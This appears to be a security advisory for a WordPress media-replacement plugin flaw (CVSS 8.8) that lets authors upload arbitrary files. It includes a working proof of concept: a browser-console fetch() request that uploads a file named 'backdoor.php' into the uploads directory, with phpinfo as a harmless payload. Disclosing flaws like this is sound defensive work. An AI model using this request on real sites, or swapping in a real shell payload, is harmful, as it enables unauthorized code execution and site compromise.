8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
16.9%
The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.
1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php
2) Press on the new picture's thumbnail to see the attachment's details
3) Click on "Upload a new file", next to "Replace media"
4) Paste the following in your browser's developer console:
```
await fetch(document.forms[0].action, {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
"Content-Type": "multipart/form-data; boundary=---------------------------294159958331225347843177109147",
"Upgrade-Insecure-Requests": "1"
},
"body": `-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"ID\"\r\n\r\n${document.forms[0].action.match(/attachment_id=(\d+)/)[1]}\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"backdoor.php\"\r\nContent-Type: text/php\r\n\r\n<?php phpinfo();\n\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"remove_bg\"\r\n\r\nyes\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"replace_type\"\r\n\r\nreplace_and_search\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"timestamp_replace\"\r\n\r\n2\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date\"\r\n\r\nJanuary 12, 2023\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_hour\"\r\n\r\n18\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_minute\"\r\n\r\n41\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date_formatted\"\r\n\r\n2023-01-12\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"location_dir\"\r\n\r\n2023/01\r\n-----------------------------294159958331225347843177109147--\r\n`,
"method": "POST",
"mode": "cors"
});
```
5) Check the wp-content/uploads/2023/01 directory for the backdoor.php file.
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
16.9%